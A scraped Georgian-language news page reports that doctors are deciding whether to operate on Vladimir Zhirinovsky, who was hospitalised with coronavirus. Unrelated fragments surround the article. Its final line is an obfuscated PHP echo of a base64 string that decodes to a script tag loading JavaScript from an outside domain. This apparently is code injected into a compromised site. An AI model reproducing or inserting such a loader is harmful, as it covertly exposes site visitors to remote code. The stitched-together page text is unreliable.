celsiusi
ავერსი შნაიდერი
ექიმებს უჭირთ გადაწყვეტა, გაუკეთონ თუ არა ოპერაცია ვლადიმერ ჟირინოვსკის - ამის შესახებ ინფორმაციას რუსული მედია  ავრცელებს. 
 
მედიაში გავრცელებული ინფორმაციით, ახლა ექიმები ოპერაციის გაკეთების შესაძლებლობას განიხილავენ, თუმცა ამას ლიბერალ-დემოკრატიული პარტიის ლიდერის ჯანმრთელობის მძიმე მდგომარეობა უშლის ხელს. 
 
ბოლო დღეებში, ჟირინოვსკის ჯანმრთელობის გაუმჯობესება შეინიშნება, თუმცა მიუხედავად ამისა, არ იციან გადაიტანს თუ არა რუსი პოლიტიკოსი ოპერაციას. გარდა ამისა, ექიმები ჟირინოვსკის მდგომარეობას კვირის დასაწყისში სტაბილურად მძიმედ აფასებდნენ.
 
ცნობისთვის, 2 თებერვალს ვლადიმერ ჟირინოვსკი ცენტრალურ საავადმყოფოში კორონავირუსის გამო გადაიყვანეს.
834
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");